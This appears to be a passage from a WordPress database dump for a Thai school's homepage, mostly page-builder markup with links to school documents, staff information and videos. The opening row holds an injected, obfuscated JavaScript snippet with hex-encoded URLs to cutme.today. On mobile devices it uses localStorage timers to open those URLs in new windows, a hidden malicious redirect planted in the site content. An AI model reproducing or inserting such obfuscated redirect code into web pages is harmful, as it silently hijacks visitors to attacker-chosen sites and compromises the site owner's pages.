_0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 13:54:28','2024-08-30 06:54:28','',19,'http://watprato.ssk.in.th/?p=338',0,'revision','',0),
(339,2,'2024-08-30 13:57:10','2024-08-30 06:57:10','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br>   <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br>      <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br>       <a 